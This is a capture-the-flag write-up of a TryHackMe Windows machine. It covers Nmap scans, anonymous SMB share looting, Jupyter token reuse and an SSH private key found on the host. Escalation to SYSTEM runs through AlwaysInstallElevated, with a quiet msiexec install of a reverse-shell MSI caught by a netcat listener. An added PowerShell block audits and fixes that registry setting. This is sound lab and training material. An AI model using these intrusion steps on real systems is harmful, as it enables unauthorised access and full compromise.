#tryhackme #medium #windows
![[Pasted image 20250713142911.png]]
---
# Information Gathering - Nmap
I started off by scanning all TCP ports.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn --open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-13 11:28 CDT
Nmap scan report for 10.10.102.97
Host is up (0.13s latency).
Not shown: 65377 closed tcp ports (reset), 143 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
8888/tcp open sun-answerbook
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49672/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 23.43 seconds
```
Then I did another TCP scan against the open ports for more detailed information.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sCV $IP -p 22,135,139,445,3389,5985,8888,47001,49664,49665,49667-49672
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-13 11:33 CDT
Nmap scan report for 10.10.102.97
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 2b:17:d8:8a:1e:8c:99:bc:5b:f5:3d:0a:5e:ff:5e:5e (RSA)
| 256 3c:c0:fd:b5:c1:57:ab:75:ac:81:10:ae:e2:98:12:0d (ECDSA)
|_ 256 e9:f0:30:be:e6:cf:ef:fe:2d:14:21:a0:ac:45:7b:70 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DEV-DATASCI-JUP
| Not valid before: 2025-07-12T16:26:49
|_Not valid after: 2026-01-11T16:26:49
| rdp-ntlm-info:
| Target_Name: DEV-DATASCI-JUP
| NetBIOS_Domain_Name: DEV-DATASCI-JUP
| NetBIOS_Computer_Name: DEV-DATASCI-JUP
| DNS_Domain_Name: DEV-DATASCI-JUP
| DNS_Computer_Name: DEV-DATASCI-JUP
| Product_Version: 10.0.17763
|_ System_Time: 2025-07-13T16:34:50+00:00
|_ssl-date: 2025-07-13T16:34:59+00:00; -1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8888/tcp open http Tornado httpd 6.0.3
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: TornadoServer/6.0.3
| http-title: Jupyter Notebook
|_Requested resource was /login?next=%2Ftree%3F
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp closed unknown
49672/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-07-13T16:34:51
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.76 seconds
```
Lastly, a UDP scan was done against the top 10 ports.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --min-rate 3000 --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-13 11:39 CDT
Nmap scan report for 10.10.102.97
Host is up (0.13s latency).
PORT STATE SERVICE
53/udp open|filtered domain
67/udp open|filtered dhcps
123/udp open|filtered ntp
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
161/udp open|filtered snmp
445/udp open|filtered microsoft-ds
631/udp open|filtered ipp
1434/udp closed ms-sql-m
Nmap done: 1 IP address (1 host up) scanned in 1.42 seconds
```
---
# Enumeration
##### Port 139, 445 - SMB
I was able to enumerate shares and the share `datasci-team` stood out because it's not a default share.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ smbclient -N -L //$IP
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
datasci-team Disk
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.102.97 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```
It contained a few directories and files. Downloading each file one by one would be very inconvenient, so I'll just download everything to my local Kali and look through them there.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ smbclient -N //$IP/datasci-team
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Aug 25 10:27:02 2022
.. D 0 Thu Aug 25 10:27:02 2022
.ipynb_checkpoints DA 0 Thu Aug 25 10:26:47 2022
Long-Tailed_Weasel_Range_-_CWHR_M157_[ds1940].csv A 146 Thu Aug 25 10:26:46 2022
misc DA 0 Thu Aug 25 10:26:47 2022
MPE63-3_745-757.pdf A 414804 Thu Aug 25 10:26:46 2022
papers DA 0 Thu Aug 25 10:26:47 2022
pics DA 0 Thu Aug 25 10:26:47 2022
requirements.txt A 12 Thu Aug 25 10:26:46 2022
weasel.ipynb A 4308 Thu Aug 25 10:26:46 2022
weasel.txt A 51 Thu Aug 25 10:26:46 2022
15587583 blocks of size 4096. 8949754 blocks available
smb: \>
```
I used the `prompt off` command to prevent the share from asking me whether to download each file. Then, I used `recurse on` to enable recursive downloading of subdirectories, and finally, `mget *` to download everything.
![[Pasted image 20250713114957.png]]
##### HTTP - Port 8888
The page on port 8888 is asking for a password or token to log in.
![[Pasted image 20250713115745.png]]
I found a file named `jupyter-token.txt` under the `misc` directory in the SMB share.
![[Pasted image 20250713120425.png]]
I successfully logged in with the token, but everything here is basically what I had already downloaded from the SMB share.
![[Pasted image 20250713120614.png]]
I felt like there was more going on behind what I could see here on Port 8080, so I ran `gobuster` to enumerate directories. It revealed a few directories to explore, and I visited each.
![[Pasted image 20250713122854.png]]
# Exploitation - Initial Access
Among the directories found, the `/lab` directory is the most interesting because it has a built-in terminal where we can execute commands.
![[Pasted image 20250713124115.png]]
Looking around the system, I found a file named `dev-datasci-lowpriv_id_ed25519`. The `file` command revealed it's an OpenSSH private key.
![[Pasted image 20250713123825.png]]
![[Pasted image 20250713122723.png]]
Using the private key, I was able to log into the remote Windows system as the `dev-datasci-lowpriv` user.
![[Pasted image 20250713123926.png]]
![[Pasted image 20250713123910.png]]
Found `user.txt` in `C:\Users\dev-datasci-lowpriv\Desktop`.
![[Pasted image 20250713124235.png]]
# Privilege Escalation
I spent a fair amount of time looking around the system for privilege escalation hints, but I couldn't find any. I still have a lot of room to improve, especially when it comes to Windows machines. I transferred `winpeas` from my local Kali to this remote Windows machine.
`Winpeas` revealed the password for the current user. Let's take note of this.
![[Pasted image 20250713141708.png]]
`Winpeas` revealed that the system is vulnerable to the `AlwaysInstallElevated` exploit.
- This is a Windows misconfiguration: when the policy is enabled, the Windows Installer service installs any MSI (Windows Installer) package with **`SYSTEM privileges`**, regardless of which user launches it.
- When both the user and machine registry keys for `AlwaysInstallElevated` are set to `1`, a low-privileged user can run a malicious MSI file and gain full system control.
As you can see from the screenshot below, the `AlwaysInstallElevated` value under both `HKCU` and `HKLM` is set to `1`, indicating that we can exploit this system and gain full system control.
![[Pasted image 20250713140400.png]]
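As an added example (not part of the original writeup or of winPEAS), here is a PowerShell audit a defender can run on the host to confirm the state of both `AlwaysInstallElevated` values, clear them, and look for past MSI installs; the two registry paths and the `MsiInstaller` 1033 event are standard Windows locations, while the function names are my own.

```powershell
# Added example: audit and remediate the AlwaysInstallElevated policy.
# The policy is only effective when BOTH hives hold the value 1, so
# clearing either one closes the hole (clear both to be safe).
$Paths = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedState {
    $state = @{}
    foreach ($p in $Paths) {
        $hive = $p.Split(':')[0]
        # A missing key or value means the policy is not set (treated as 0).
        $val = (Get-ItemProperty -Path $p -Name AlwaysInstallElevated `
                    -ErrorAction SilentlyContinue).AlwaysInstallElevated
        $state[$hive] = if ($null -eq $val) { 0 } else { [int]$val }
    }
    [pscustomobject]@{
        HKLM       = $state['HKLM']
        HKCU       = $state['HKCU']
        Vulnerable = ($state['HKLM'] -eq 1 -and $state['HKCU'] -eq 1)
    }
}

function Disable-AlwaysInstallElevated {
    # Writing the HKLM value needs an elevated prompt. If the value is pushed
    # by Group Policy, fix the GPO as well or the next refresh restores it.
    foreach ($p in $Paths) {
        if (Test-Path $p) {
            Set-ItemProperty -Path $p -Name AlwaysInstallElevated -Value 0 -Type DWord
        }
    }
}

$r = Get-AlwaysInstallElevatedState
$r | Format-List
if ($r.Vulnerable) {
    Write-Warning 'AlwaysInstallElevated is 1 in both hives: any user can install an MSI as SYSTEM.'
    # Disable-AlwaysInstallElevated
}

# Hunting for abuse: Windows Installer logs successful installs to the
# Application log under provider MsiInstaller, event ID 1033. Installs
# recorded for a low-privileged account while the policy was on deserve a look.
Get-WinEvent -FilterHashtable @{ LogName = 'Application'; ProviderName = 'MsiInstaller'; Id = 1033 } `
    -MaxEvents 20 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, UserId, Message
```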
First, we need to generate a reverse shell payload as an `.msi` file on my local Kali.
![[Pasted image 20250713140542.png]]
Transfer the reverse shell payload from the local Kali to the remote Windows system using `certutil`.
![[Pasted image 20250713140709.png]]
I ran the following command multiple times, but nothing happened: `msiexec /quiet /qn /i C:\Users\dev-datasci-lowpriv\Desktop\Temp\revshell.msi`
Then I added `runas /u:dev-datasci-lowpriv` in front; this time it executed and asked for the password of the current user.
![[Pasted image 20250713142718.png]]
After it executed, I went back to my local Kali and saw that my netcat listener had received a reverse shell as `nt authority\system`.
![[Pasted image 20250713142734.png]]
Found `root.txt`.
![[Pasted image 20250713142814.png]]